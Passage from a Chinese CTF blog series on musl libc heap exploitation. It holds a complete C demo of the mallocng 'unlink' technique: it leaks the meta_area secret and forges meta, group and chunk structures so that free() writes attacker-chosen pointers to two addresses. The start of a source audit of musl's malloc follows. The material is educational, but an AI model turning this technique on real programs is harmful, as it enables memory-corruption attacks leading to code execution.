	int index = get_slot_index(p);
	if (p[-4]) {
		assert(!offset);
		offset = *(uint32_t *)(p - 8);
		assert(offset > 0xffff);
	}
	const struct group *base = (const void *)(p - UNIT*offset - UNIT);
	const struct meta *meta = base->meta;
	assert(meta->mem == base);
	assert(index <= meta->last_idx);
	assert(!(meta->avail_mask & (1u<<index)));
	assert(!(meta->freed_mask & (1u<<index)));
	const struct meta_area *area = (void *)((uintptr_t)meta & -4096);
	assert(area->check == ctx.secret);
	if (meta->sizeclass < 48) {
		assert(offset >= size_classes[meta->sizeclass]*index);
		assert(offset < size_classes[meta->sizeclass]*(index+1));
	} else {
		assert(meta->sizeclass == 63);
	}
	if (meta->maplen) {
		assert(offset <= meta->maplen*4096UL/UNIT - 1);
	}
	return (struct meta *)meta;
}

meta->mem == base，即meta中保存的group指针要正确。
index <= meta->last_idx，即chunk的索引不能越界。
area->check == ctx.secret，即meta所在的meta_area的校验值正确。
offset >= size_classes[meta->sizeclass]*index
offset < size_classes[meta->sizeclass]*(index+1)，这两个检查offset和chunk大小是否对应。
assert(offset <= meta->maplen*4096UL/UNIT - 1);，即检查offset是否越界。

如果伪造的meta位于一个伪造的meta_area中，需要首先获取校验值secret并保存到meta_area开头，即这一页最开始的地方。

通过这个函数的检查之后，nontrivial_free的分支语句：

static struct mapinfo nontrivial_free(struct meta *g, int i)
{
	uint32_t self = 1u<<i;
	int sc = g->sizeclass;
	uint32_t mask = g->freed_mask | g->avail_mask;

	if (mask+self == (2u<<g->last_idx)-1 && okay_to_free(g)) {
		// any multi-slot group is necessarily on an active list
		// here, but single-slot groups might or might not be.
		if (g->next) {
			assert(sc < 48);
			int activate_new = (ctx.active[sc]==g);
			dequeue(&ctx.active[sc], g);
			if (activate_new && ctx.active[sc])
				activate_group(ctx.active[sc]);
		}
		return free_group(g);
	} else if (!mask) {
		assert(sc < 48);
		// might still be active if there were no allocations
		// after last available slot was taken.
		if (ctx.active[sc] != g) {
			queue(&ctx.active[sc], g);
		}
	}
	a_or(&g->freed_mask, self);
	return (struct mapinfo){ 0 };
}

这里要求mask+self == (2u<<g->last_idx)-1 && okay_to_free(g)，因此要合理设置meta的两个mask的值。

之后调用了free_group：

static struct mapinfo free_group(struct meta *g)
{
	struct mapinfo mi = { 0 };
	int sc = g->sizeclass;
	if (sc < 48) {
		ctx.usage_by_class[sc] -= g->last_idx+1;
	}
	if (g->maplen) {
		step_seq();
		record_seq(sc);
		mi.base = g->mem;
		mi.len = g->maplen*4096UL;
	} else {
		void *p = g->mem;
		struct meta *m = get_meta(p);
		int idx = get_slot_index(p);
		g->mem->meta = 0;
		// not checking size/reserved here; it's intentionally invalid
		mi = nontrivial_free(m, idx);
	}
	free_meta(g);
	return mi;
}

这里我们不能在if-else语句中跳转到else分支，那样会再一次调用nontrivial_free，因此要保证meta的maplen字段不为0。

这些检查与条件判断通过后，就可以成功释放假chunk了。

下面就是musl libc unlink漏洞的demo程序，如有任何非预期情况请与笔者联系，不胜感激。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>

struct meta {
    struct meta *prev, *next;
    struct group *mem;
    volatile int avail_mask, freed_mask;
    unsigned long long last_idx:5;
    unsigned long long freeable:1;
    unsigned long long sizeclass:6;
    unsigned long long maplen:8*8-12;
};

struct group {
    struct meta *meta;
    unsigned char active_idx:5;
    char pad[0x10 - sizeof(struct meta *) - 1];
    unsigned char storage[];
};

struct meta_area {
    unsigned long long check;
    struct meta_area *next;
    int nslots;
    struct meta slots[];
};

unsigned long long victim_1[0x8];
unsigned long long victim_2[0x8];

#define BLACK       "30"
#define RED         "31"
#define GREEN       "32"
#define YELLOW      "33"
#define BLUE        "34"
#define PURPLE      "35"
#define GREEN_DARK  "36"
#define WHITE       "37"

#define UNDEFINED   "-"
#define HIGHLIGHT   "1"
#define UNDERLINE   "4"
#define SPARK       "5"

#define STR_END      "\033[0m"

void printf_color(char* color, char* effect, char* string){
    char buffer[0x1000] = {0};
    strcpy(buffer, "\033[");
    if(effect[0] != '-'){
        strcat(buffer, effect);
        strcat(buffer, ";");
    }
    strcat(buffer, color);
    strcat(buffer, "m");
    strcat(buffer, string);
    printf("%s" STR_END, buffer);
}

void print_binary(char* buf, int length){
    printf("---------------------------------------------------------------------------\n");
    printf("Address info starting in %p:\n", buf);
    int index = 0;
    char output_buffer[80];
    memset(output_buffer, '\0', 80);
    memset(output_buffer, ' ', 0x10);
    for(int i=0; i<(length % 16 == 0 ? length / 16 : length / 16 + 1); i++){
        char temp_buffer[0x10];
        memset(temp_buffer, '\0', 0x10);
        sprintf(temp_buffer, "%#5x", index);
        strcpy(output_buffer, temp_buffer);
        output_buffer[5] = ' ';
        output_buffer[6] = '|';
        output_buffer[7] = ' ';
        for(int j=0; j<16; j++){
            if(index+j >= length)
                sprintf(output_buffer+8+3*j, "   ");
            else{
                sprintf(output_buffer+8+3*j, "%02x ", ((int)buf[index+j]) & 0xFF);
                if(!isprint(buf[index+j]))
                    output_buffer[58+j] = '.';
                else
                    output_buffer[58+j] = buf[index+j];
            }
        }
        output_buffer[55] = ' ';
        output_buffer[56] = '|';
        output_buffer[57] = ' ';
        printf("%s\n", output_buffer);
        memset(output_buffer+58, '\0', 16);
        index += 16;
    }
    printf("---------------------------------------------------------------------------\n");
}

struct group* get_group(const unsigned char* chunk){
    int offset = *(const unsigned short *)(chunk - 2);
    if (chunk[-4])
        offset = *(unsigned int *)(chunk - 8);
    struct group* group_addr = (void *)(chunk - 0x10*offset - 0x10);
    return group_addr;
}

struct meta* get_meta(const unsigned char* chunk){
    struct group* group_addr = get_group(chunk);
    struct meta* meta_addr = group_addr->meta;
    return meta_addr;
}

struct meta_area* get_meta_area(const void* meta){
    return (struct meta_area*)((unsigned long long)meta & -4096);
}

int main(){
    printf_color(GREEN, UNDEFINED, "本程序用于演示musl libc中的unlink操作。\n");
    printf_color(GREEN, UNDEFINED, "测试环境：ubuntu 22.04，musl libc版本：1.2.2。\n");
    printf_color(GREEN, UNDEFINED, "鉴于musl libc的轻量性，与其相关的利用方式也较为单一。\n");
    printf_color(GREEN, UNDEFINED, "本程序所演示的unlink是最为常用的一种利用方式之一。\n");

    printf_color(GREEN, UNDEFINED, "musl libc与glibc不同，在主程序的main函数开始执行时，内存分配器就已经完成了初始化。\n");
    printf_color(GREEN, UNDEFINED, "请注意：在一个group中分配出来的chunk很可能在地址空间上不相邻。\n");
    printf_color(GREEN, UNDEFINED, "因为一个group需要确保每个chunk都能够容纳该范围内最大的chunk。\n");
    printf_color(GREEN, UNDEFINED, "因此，调试便是musl libc赛题的重中之重。\n");
    printf_color(GREEN, UNDEFINED, "下面是刚刚进入main函数时堆的情况：\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "pwndbg> mheap\n"
                 "          secret : 0xd8e803bc461ae35a\n"
                 "    mmap_counter : 0x0\n"
                 "      avail_meta : 0x55555555a0e0 (count: 96)\n"
                 "       free_meta : 0\n"
                 " avail_meta_area : 0x55555555b000 (count: 0)\n"
                 "  meta_area_head : 0x55555555a000\n"
                 "  meta_area_tail : 0x55555555a000\n"
                 "       active[7] : 0x55555555a090 (mem: 0x555555558f40) -> 0x55555555a0b8 (mem: 0x7ffff7ffef40) [0x80]\n"
                 "      active[15] : 0x55555555a068 (mem: 0x555555558d40) [0x1f0]\n"
                 "      active[19] : 0x55555555a040 (mem: 0x555555558940) [0x3f0]\n"
                 "      active[23] : 0x55555555a018 (mem: 0x555555558140) [0x7f0]\n\n");

    printf_color(GREEN, UNDEFINED, "可见已经有一些meta被链入到链表数组之中了。\n");
    printf_color(GREEN, UNDEFINED, "但这对做题的影响并不大，通过多次调试，我们就能够让自己的chunk进入想要的meta。\n");
    printf_color(GREEN, UNDEFINED, "接下来让我们尝试分配几个chunk。\n");

    void* chunks[14];

    for(int i=0; i<14; i++) {
        chunks[i] = malloc(0x140);
        printf_color(GREEN, UNDEFINED, "第");
        printf("\033[" GREEN "m%d\033[0m", i+1);
        printf_color(GREEN, UNDEFINED, "次malloc返回的地址为：");
        printf("\033[1;31m%p\n\033[0m", chunks[i]);
    }

    printf_color(GREEN, UNDEFINED, "\n接下来让我们用源码中给出的寻找chunk所在meta的方法回溯这些chunk所在的group和meta。\n");
    struct group* groups[14];
    struct meta* metas[14];
    for(int i=0; i<14; i++){
        groups[i] = get_group(chunks[i]);
        metas[i] = get_meta(chunks[i]);
    }

    for(int i=0; i<14; i++){
        printf_color(GREEN, UNDEFINED, "第");
        printf("\033[" GREEN "m%d\033[0m", i+1);
        printf_color(GREEN, UNDEFINED, "次malloc获得chunk的group地址和meta地址分别为：");
        printf("\033[1;31m%p %p\n\033[0m", groups[i], metas[i]);
    }

    printf_color(GREEN, UNDEFINED, "通过nontrivial_free中的dequeue函数进行unlink，首先要通过get_meta函数的重重检查：\n\n");
    printf_color(YELLOW, HIGHLIGHT, "(/src/malloc/mallocng/meta.h, line 129)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "static inline struct meta *get_meta(const unsigned char *p)\n"
                 "{\n"
                 "\tassert(!((uintptr_t)p & 15));\n"
                 "\tint offset = *(const uint16_t *)(p - 2);\n"
                 "\tint index = get_slot_index(p);\n"
                 "\tif (p[-4]) {\n"
                 "\t\tassert(!offset);\n"
                 "\t\toffset = *(uint32_t *)(p - 8);\n"
                 "\t\tassert(offset > 0xffff);\n"
                 "\t}\n"
                 "\tconst struct group *base = (const void *)(p - UNIT*offset - UNIT);\n"
                 "\tconst struct meta *meta = base->meta;\n"
                 "\tassert(meta->mem == base);\n"
                 "\tassert(index <= meta->last_idx);\n"
                 "\tassert(!(meta->avail_mask & (1u<<index)));\n"
                 "\tassert(!(meta->freed_mask & (1u<<index)));\n"
                 "\tconst struct meta_area *area = (void *)((uintptr_t)meta & -4096);\n"
                 "\tassert(area->check == ctx.secret);\n"
                 "\tif (meta->sizeclass < 48) {\n"
                 "\t\tassert(offset >= size_classes[meta->sizeclass]*index);\n"
                 "\t\tassert(offset < size_classes[meta->sizeclass]*(index+1));\n"
                 "\t} else {\n"
                 "\t\tassert(meta->sizeclass == 63);\n"
                 "\t}\n"
                 "\tif (meta->maplen) {\n"
                 "\t\tassert(offset <= meta->maplen*4096UL/UNIT - 1);\n"
                 "\t}\n"
                 "\treturn (struct meta *)meta;\n"
                 "}\n\n");

    printf_color(GREEN, UNDEFINED, "下面我们逐一查看一下这些检查的具体内容。\n");
    printf_color(YELLOW, HIGHLIGHT, "1. meta->mem == base，即meta中保存的group指针要正确。\n");
    printf_color(YELLOW, HIGHLIGHT, "2. index <= meta->last_idx，即chunk的索引不能越界。\n");
    printf_color(RED   , HIGHLIGHT, "3. area->check == ctx.secret，即meta所在的meta_area的校验值正确。\n");
    printf_color(YELLOW, HIGHLIGHT, "4. offset >= size_classes[meta->sizeclass]*index\n");
    printf_color(YELLOW, HIGHLIGHT, "5. offset < size_classes[meta->sizeclass]*(index+1)，这两个检查offset和chunk大小是否对应。\n");
    printf_color(YELLOW, HIGHLIGHT, "6. assert(offset <= meta->maplen*4096UL/UNIT - 1);，即检查offset是否越界。\n");

    printf_color(GREEN, UNDEFINED, "这些检查之中对我们最为重要的就是校验值的检查。\n");
    printf_color(GREEN, UNDEFINED, "只有泄露出secret值，我们才能释放伪造meta_area中伪造meta的group的chunk。\n");

    struct meta_area* area = get_meta_area(metas[0]);
    printf_color(GREEN, UNDEFINED, "上面分配的所有meta均在同一个meta_area中，地址为：");
    printf("\033[1;" YELLOW "m%p\n\033[0m", area);

    printf_color(GREEN, UNDEFINED, "可以由此获取到secret的值为：");
    printf("\033[1;" YELLOW "m%#llx\n\n\033[0m", area->check);

    unsigned long long secret = area->check;

    printf_color(GREEN, UNDEFINED, "接下来我们来伪造chunk以及其上的结构。\n");

    void* mmap_space = mmap((void*)0xdeadbeef000, 0x2000, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);
    struct meta_area* fake_meta_area = mmap_space;
    fake_meta_area->check = secret;

    struct meta* fake_meta = (struct meta*)((unsigned long long) mmap_space + 0x100);
    fake_meta->maplen = 1;
    fake_meta->sizeclass = 7;       // group中保存的chunk大小，这里设置为0x80
    fake_meta->last_idx = 4;        // group中chunk的总数，这里设置为4表示chunk总数为5
    fake_meta->freeable = 1;        // 通过okay_to_free检查

    struct group* fake_group = (struct group*)((unsigned long long) mmap_space + 0x1000);
    fake_meta->mem = fake_group;    // 通过检查1
    fake_group->meta = fake_meta;   // 使group能够找到meta
    fake_meta->avail_mask = 0b11101;// 使nontrivial_free进入if循环，得以执行dequeue

    char* fake_chunk = (char*)((unsigned long long) mmap_space + 0x1000 + 0x10 + 0x80);
    *(unsigned short *)(fake_chunk - 2) = 8;    // offset
    *(unsigned char*)(fake_chunk - 3) = 1;      // index

    printf_color(GREEN, UNDEFINED, "绕过第1个检查，只需要设置meta中的group指针为假group指针即可。\n");
    printf_color(GREEN, UNDEFINED, "第2个检查需要正确设置chunk的index值，本程序释放的是group中第2个chunk，因此索引为1。\n");
    printf_color(GREEN, UNDEFINED, "注意索引值存放的位置，是chunk地址-3这个字节。\n");
    printf_color(GREEN, UNDEFINED, "第3个检查需要我们提前泄露secret的值，并填写到meta_area中。\n");
    printf_color(GREEN, UNDEFINED, "检查4和5只需要正确计算chunk的大小，填写chunk的索引值即可。\n");
    printf_color(GREEN, UNDEFINED, "本程序尝试释放sizeclass=7的chunk，即chunk大小为0x80，因此第2个chunk的索引为0x80>>4=8。\n");
    printf_color(GREEN, UNDEFINED, "索引值index保存在chunk的前面两个字节中，正确填入即可。\n");
    printf_color(GREEN, UNDEFINED, "正确设置index后，检查6一般也是没有问题的。\n\n");

    printf_color(GREEN, UNDEFINED, "在通过get_meta的检查后，还需要通过nontrivial_free中的if语句条件判断。\n\n");
    printf_color(YELLOW, HIGHLIGHT, "(/src/malloc/mallocng/free.c, line 72)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "static struct mapinfo nontrivial_free(struct meta *g, int i)\n"
                 "{\n"
                 "\tuint32_t self = 1u<<i;\n"
                 "\tint sc = g->sizeclass;\n"
                 "\tuint32_t mask = g->freed_mask | g->avail_mask;\n"
                 "\n"
                 "\t\033[1;31mif (mask+self == (2u<<g->last_idx)-1 && okay_to_free(g))\033[1;" PURPLE "m {\n"
                 "\t\t// any multi-slot group is necessarily on an active list\n"
                 "\t\t// here, but single-slot groups might or might not be.\n"
                 "\t\tif (g->next) {\n"
                 "\t\t\tassert(sc < 48);\n"
                 "\t\t\tint activate_new = (ctx.active[sc]==g);\n"
                 "\t\t\tdequeue(&ctx.active[sc], g);\n"
                 "\t\t\tif (activate_new && ctx.active[sc])\n"
                 "\t\t\t\tactivate_group(ctx.active[sc]);\n"
                 "\t\t}\n"
                 "\t\treturn free_group(g);\n"
                 "\t} else if (!mask) {\n"
                 "\t\tassert(sc < 48);\n"
                 "\t\t// might still be active if there were no allocations\n"
                 "\t\t// after last available slot was taken.\n"
                 "\t\tif (ctx.active[sc] != g) {\n"
                 "\t\t\tqueue(&ctx.active[sc], g);\n"
                 "\t\t}\n"
                 "\t}\n"
                 "\ta_or(&g->freed_mask, self);\n"
                 "\treturn (struct mapinfo){ 0 };\n"
                 "}\n\n");

    printf_color(GREEN, UNDEFINED, "只需要修改meta中的freeable字段为1即可通过该检查。\n");

    printf_color(GREEN, UNDEFINED, "最后还需要在free_group中进入正确的else分支：\n\n");
    printf_color(RED, HIGHLIGHT, "(/src/malloc/mallocng/free.c, line 14)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "static struct mapinfo free_group(struct meta *g)\n"
                 "{\n"
                 "\tstruct mapinfo mi = { 0 };\n"
                 "\tint sc = g->sizeclass;\n"
                 "\tif (sc < 48) {\n"
                 "\t\tctx.usage_by_class[sc] -= g->last_idx+1;\n"
                 "\t}\n"
                 "\tif (g->maplen) {\n"
                 "\t\tstep_seq();\n"
                 "\t\trecord_seq(sc);\n"
                 "\t\tmi.base = g->mem;\n"
                 "\t\tmi.len = g->maplen*4096UL;\n"
                 "\t} else {\n"
                 "\t\tvoid *p = g->mem;\n"
                 "\t\tstruct meta *m = get_meta(p);\n"
                 "\t\tint idx = get_slot_index(p);\n"
                 "\t\tg->mem->meta = 0;\n"
                 "\t\t// not checking size/reserved here; it's intentionally invalid\n"
                 "\t\tmi = nontrivial_free(m, idx);\n"
                 "\t}\n"
                 "\tfree_meta(g);\n"
                 "\treturn mi;\n"
                 "}\n\n");
    printf_color(GREEN, UNDEFINED, "这需要我们设置meta->maplen为非零值，防止再次进入nontrivial_free。\n");
    printf_color(GREEN, UNDEFINED, "这里的maplen就设置为group占用的页数量即可。\n");

    printf_color(GREEN, UNDEFINED, "接下来我们向meta的两个链表指针写入事先准备好的地址。\n");
    printf_color(GREEN, UNDEFINED, "meta->prev写入：");
    printf("\033[1;" YELLOW "m%p\033[0m\n", victim_1);
    printf_color(GREEN, UNDEFINED, "meta->next写入：");
    printf("\033[1;" YELLOW "m%p\033[0m\n", victim_2);

    fake_meta->prev = (struct meta*)victim_1;
    fake_meta->next = (struct meta*)victim_2;

    printf_color(GREEN, UNDEFINED, "下面调用free函数释放这个假chunk。\n\n");

    free(fake_chunk);

    printf_color(GREEN, UNDEFINED, "释放后，目标地址附近的值已经被成功修改：\n");
    print_binary((char*)victim_1, 0x80);

    return 0;
}

这证明使用一个假chunk修改两个地址的值是可行的，在free之后，chunk所在的页被释放了，这样就不会对接下来的进一步利用造成其他任何影响了。

为了利用unlink，我们需要构造很多东西，不能落下其中任何一个，在解题与学习时要特别注意。在下一篇文章中笔者将会分析unlink如何与FILE结构体配合，从而最终getshell。

musl pwn 入门 (1)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， musl pwn 系列
本文字数： 15k 阅读时长 ≈ 13 分钟

近年来，musl libc作为一个轻量级的libc越来越多地出现在CTF pwn题之中，其和glibc相比有一定的差距，因此本文我们就musl libc最常考的考点——内存分配，进行musl libc的源代码审计。

不同于glibc多达四五千行代码，大小超过10w字节的malloc.c，musl libc中的malloc.c大小甚至都不到1w字节，其轻量级的特性也使得我们更加容易去阅读它的代码。

musl libc在内存分配上经历过一次大的改动（1.2.0->1.2.1），本文针对发文时的最新版本1.2.3进行分析。

参考文章：传送门

1. 主要数据结构

malloc_context

struct malloc_context {
	uint64_t secret;
#ifndef PAGESIZE
	size_t pagesize;
#endif
	int init_done;
	unsigned mmap_counter;
	struct meta *free_meta_head;
	struct meta *avail_meta;
	size_t avail_meta_count, avail_meta_area_count, meta_alloc_shift;
	struct meta_area *meta_area_head, *meta_area_tail;
	unsigned char *avail_meta_areas;
	struct meta *active[48];
	size_t usage_by_class[48];
	uint8_t unmap_seq[32], bounces[32];
	uint8_t seq;
	uintptr_t brk;
};

这个结构体是musl libc的堆管理最上层结构，其中字段的含义分别为：

uint64_t secret：一个随机生成的数，用于检查meta的合法性，也即一个check guard
size_t pagesize：页大小，在x86_64下一般为为0x1000
int init_done：判断malloc_context是否初始化完成，在alloc_meta函数中进行检查，如果没有则进行初始化，否则跳过初始化流程
unsigned mmap_counter：mmap计数器，通过mmap分配了多少次空间用于内存分配
struct meta *free_meta_head：被释放的meta结构体构成的链表表头，meta结构体是musl libc内存分配的低一级结构，后面会提到
struct meta *avail_meta：空闲的meta结构体构成的链表表头
size_t avail_meta_count, avail_meta_area_count, meta_alloc_shift：
- size_t avail_meta_count：空闲meta的数量
- size_t avail_meta_area_count：空闲meta_area的数量，meta_area是meta的控制结构
- size_t meta_alloc_shift：<暂缺>
struct meta_area *meta_area_head, *meta_area_tail：meta_area链表表头，链表表尾
unsigned char *avail_meta_areas：<暂缺>
struct meta *active[48]：可以继续分配的meta
size_t usage_by_class[48]：对应大小的缓存的所有meta的group所管理的chunk个数
uint8_t unmap_seq[32], bounces[32]：<暂缺>
uint8_t seq：<暂缺>
uintptr_t brk：记录目前的brk(0)

其中有一些字段无法通过简单查看代码得到，需要进一步代码审计获取其含义，我们后面再进行补充。

meta_area

struct meta_area {
	uint64_t check;
	struct meta_area *next;
	int nslots;
	struct meta slots[];
};

这个结构用于管理一页内的所有meta结构，属于malloc_context的下级结构，meta的上级结构。

uint64_t check：检查字段，与malloc_context中的secret字段对应，检查该meta_area是否可能被修改
struct meta_area *next：下一个meta_area的地址，构成链表
int nslots：该meta_area中管理的meta数量，一般为固定值
struct meta slots[]：管理的meta数组

group

struct group {
	struct meta *meta;
	unsigned char active_idx:5;
	char pad[UNIT - sizeof(struct meta *) - 1];
	unsigned char storage[];
};

group中即保存有需要分配出去的chunk。

struct meta *meta：所属的meta的地址
unsigned char active_idx:5：5个比特，表示还有多少可用chunk
char pad[UNIT - sizeof(struct meta *) - 1]：手动16字节对齐
unsigned char storage[]：要分配出去的内存空间，chunk

以上就是musl libc中主要的数据结构，下面我们通过代码审计彻底搞清楚musl libc的内存分配机制。

2. 代码审计

我们首先从内存分配相关的函数开始看起。对于辅助性的较为复杂的函数使用小标题的形式进行分析，辅助性的较为简单的函数只在第一次出现时直接写到主要函数分析代码中进行简单解释。

malloc（`/src/malloc/mallocng/malloc.c line 299`）

void *malloc(size_t n)
{
	if (size_overflows(n)) return 0;
	struct meta *g;
	uint32_t mask, first;
	int sc;
	int idx;
	int ctr;

	if (n >= MMAP_THRESHOLD) {
		size_t needed = n + IB + UNIT;
		void *p = mmap(0, needed, PROT_READ|PROT_WRITE,
			MAP_PRIVATE|MAP_ANON, -1, 0);
		if (p==MAP_FAILED) return 0;
		wrlock();
		step_seq();
		g = alloc_meta();
		if (!g) {
			unlock();
			munmap(p, needed);
			return 0;
		}
		g->mem = p;
		g->mem->meta = g;
		g->last_idx = 0;
		g->freeable = 1;
		g->sizeclass = 63;
		g->maplen = (needed+4095)/4096;
		g->avail_mask = g->freed_mask = 0;
		// use a global counter to cycle offset in
		// individually-mmapped allocations.
		ctx.mmap_counter++;
		idx = 0;
		goto success;
	}

	sc = size_to_class(n);

	rdlock();
	g = ctx.active[sc];

	// use coarse size classes initially when there are not yet
	// any groups of desired size. this allows counts of 2 or 3
	// to be allocated at first rather than having to start with
	// 7 or 5, the min counts for even size classes.
	if (!g && sc>=4 && sc<32 && sc!=6 && !(sc&1) && !ctx.usage_by_class[sc]) {
		size_t usage = ctx.usage_by_class[sc|1];
		// if a new group may be allocated, count it toward
		// usage in deciding if we can use coarse class.
		if (!ctx.active[sc|1] || (!ctx.active[sc|1]->avail_mask
		    && !ctx.active[sc|1]->freed_mask))
			usage += 3;
		if (usage <= 12)
			sc |= 1;
		g = ctx.active[sc];
	}

	for (;;) {
		mask = g ? g->avail_mask : 0;
		first = mask&-mask;
		if (!first) break;
		if (RDLOCK_IS_EXCLUSIVE || !MT)
			g->avail_mask = mask-first;
		else if (a_cas(&g->avail_mask, mask, mask-first)!=mask)
			continue;
		idx = a_ctz_32(first);
		goto success;
	}
	upgradelock();

	idx = alloc_slot(sc, n);
	if (idx < 0) {
		unlock();
		return 0;
	}
	g = ctx.active[sc];

success:
	ctr = ctx.mmap_counter;
	unlock();
	return enframe(g, idx, n, ctr);
}

其中MMAP_THRESHOLD等于131052。第一个判断如果为真，说明要分配一块很大的内存。首先计算一共需要的内存大小，这里IB等于4、UNIT等于16。然后使用mmap函数分配一块内存。如果分配成功，上读写锁。后面使用alloc_meta分配一个meta给这块大空间，之后设置这个meta的一些基本信息。

从这个if语句我们可以知道，如果一次内存申请的大小过大，musl libc会为这块空间专门分配一个meta和group，这个meta和group只管理这一个空间。

如果申请的空间较小，则进入下面的代码。

sc = size_to_class(n);这条语句是为了计算这个大小的chunk应该被分到哪一个class。

在musl中定义有如下内容：

// /src/malloc/mallocng/malloc.c, line 12
const uint16_t size_classes[] = {
	1, 2, 3, 4, 5, 6, 7, 8,
	9, 10, 12, 15,
	18, 20, 25, 31,
	36, 42, 50, 63,
	72, 84, 102, 127,
	146, 170, 204, 255,
	292, 340, 409, 511,
	584, 682, 818, 1023,
	1169, 1364, 1637, 2047,
	2340, 2730, 3276, 4095,
	4680, 5460, 6552, 8191,
};

size_to_class的代码如下：

static inline int size_to_class(size_t n)
{
	n = (n+IB-1)>>4;
	if (n<10) return n;
	n++;
	int i = (28-a_clz_32(n))*4 + 8;
	if (n>size_classes[i+1]) i+=2;
	if (n>size_classes[i]) i++;
	return i;
}

其中经过试验可知a_clz_32这个函数返回的是n的最高位是32位中的倒数第几高位（最高位为0）。如a_clz_32(1)=31，a_clz_32(2)=30，a_clz_32(4)=29，以此类推。由此我们可以计算出不同大小的chunk对应于哪一个索引。这个部分实际上是将chunk的大小按照数组来进行分组，数组的每一项表示这一组中chunk右移4位的值不能超过多少。如索引为10的数组元素值为12，前面一个元素为10，则第10组chunk的大小范围应该在0x100-0x11F之间。同理，第11组chunk的大小范围为0x120-0x14F。

紧接着，上读写锁。后面g = ctx.active[sc];中的ctx指的是全局__malloc_context，其active数组长度与size_classes的相同，均为48。由此可见，malloc_context将meta以管理的chunk大小进行分组，分组依据size_classes进行。

再往下的一个if语句有很多的判断条件，在某些条件成立时会修改meta指针的值，对整体影响不大，先向下看。

下面是一个循环。first = mask&-mask;是取mask的最低1位，即lowbit，这里的avail_mask实际就是选中的meta所管理的group中chunk的可用位，这里是通过可用位来查找第一个可用的chunk。内部的if-else语句是针对读写锁进行的检查，无需关注。如果在这里能够找到可用的chunk，则将chunk的索引保存到idx变量中。

如果在这个循环中没有找到合适的idx，则在循环外调用alloc_slot函数：

static int alloc_slot(int sc, size_t req)
{
	uint32_t first = try_avail(&ctx.active[sc]);
	if (first) return a_ctz_32(first);

	struct meta *g = alloc_group(sc, req);
	if (!g) return -1;

	g->avail_mask--;
	queue(&ctx.active[sc], g);
	return 0;
}

其中try_avail函数尝试从该大小的meta中分配出一个可用的chunk并返回索引，如果该可用chunk不是由位于链首的meta所提供，则会将这个chunk所在的meta移动至链首。如果尝试分配成功，则这里直接返回。否则，后面调用alloc_group函数创建一个新的meta，创建成功后将其中的第一个chunk的索引（即0）返回，并将该meta放在链首。不论如何，最终只要能够执行到标号success，就一定能够获取到idx的值。

最后返回调用了enframe函数：

static inline void *enframe(struct meta *g, int idx, size_t n, int ctr)
{
	size_t stride = get_stride(g);
	size_t slack = (stride-IB-n)/UNIT;
	unsigned char *p = g->mem->storage + stride*idx;
	unsigned char *end = p+stride-IB;
	// cycle offset within slot to increase interval to address
	// reuse, facilitate trapping double-free.
	int off = (p[-3] ? *(uint16_t *)(p-2) + 1 : ctr) & 255;
	assert(!p[-4]);
	if (off > slack) {
		size_t m = slack;
		m |= m>>1; m |= m>>2; m |= m>>4;
		off &= m;
		if (off > slack) off -= slack+1;
		assert(off <= slack);
	}
	if (off) {
		// store offset in unused header at offset zero
		// if enframing at non-zero offset.
		*(uint16_t *)(p-2) = off;
		p[-3] = 7<<5;
		p += UNIT*off;
		// for nonzero offset there is no permanent check
		// byte, so make one.
		p[-4] = 0;
	}
	*(uint16_t *)(p-2) = (size_t)(p-g->mem->storage)/UNIT;
	p[-3] = idx;
	set_size(p, end, n);
	return p;
}

这个函数的主要作用是从指定meta中取出指定索引的chunk。

try_avail（`/src/malloc/mallocng/malloc.c, line 114`）

static uint32_t try_avail(struct meta **pm)
{
	struct meta *m = *pm;
	uint32_t first;
	if (!m) return 0;
	uint32_t mask = m->avail_mask;
	if (!mask) {
		if (!m) return 0;
		if (!m->freed_mask) {
			dequeue(pm, m);
			m = *pm;
			if (!m) return 0;
		} else {
			m = m->next;
			*pm = m;
		}

		mask = m->freed_mask;

		// skip fully-free group unless it's the only one
		// or it's a permanently non-freeable group
		if (mask == (2u<<m->last_idx)-1 && m->freeable) {
			m = m->next;
			*pm = m;
			mask = m->freed_mask;
		}

		// activate more slots in a not-fully-active group
		// if needed, but only as a last resort. prefer using
		// any other group with free slots. this avoids
		// touching & dirtying as-yet-unused pages.
		if (!(mask & ((2u<<m->mem->active_idx)-1))) {
			if (m->next != m) {
				m = m->next;
				*pm = m;
			} else {
				int cnt = m->mem->active_idx + 2;
				int size = size_classes[m->sizeclass]*UNIT;
				int span = UNIT + size*cnt;
				// activate up to next 4k boundary
				while ((span^(span+size-1)) < 4096) {
					cnt++;
					span += size;
				}
				if (cnt > m->last_idx+1)
					cnt = m->last_idx+1;
				m->mem->active_idx = cnt-1;
			}
		}
		mask = activate_group(m);
		assert(mask);
		decay_bounces(m->sizeclass);
	}
	first = mask&-mask;
	m->avail_mask = mask-first;
	return first;
}

经过查找，这个函数只在alloc_slot这一处被调用，参数填的是一个meta链表的链首地址指针。

这个函数的参数是meta的二重指针，首先解引用一层获取到meta指针，如果这个meta指针无效，则返回0。

如果该meta存在，则取出其avail_mask。如果这个值为0，说明这个meta中已经没有可以用来分配的chunk了。这就进入到大if语句体内：

free_mask与avail_mask相同，以比特位标识，每一个比特位表示一个chunk是否被释放。如被释放则比特值为1。如果free_mask为0，而此时avail_mask也为1，说明这个meta中既不能分配chunk，也没有已经释放的chunk，这种情况下应该将这个meta从链表中移除，即调用dequeue函数脱链。脱链之后pm应该指向新的链首meta指针。如果链表中没有其他meta，就返回0。如果free_mask不为0，则找到下一个meta，并将链首修改为这个meta。

之后检查新链首meta中的chunk是否全部被释放且该meta不是不可释放的。这里的mask == (2u<<m->last_idx)-1就是在判断free_mask的所有有效的比特是不是全为1，如果是则跳过该chunk并再次修改链首的meta为下一个meta。

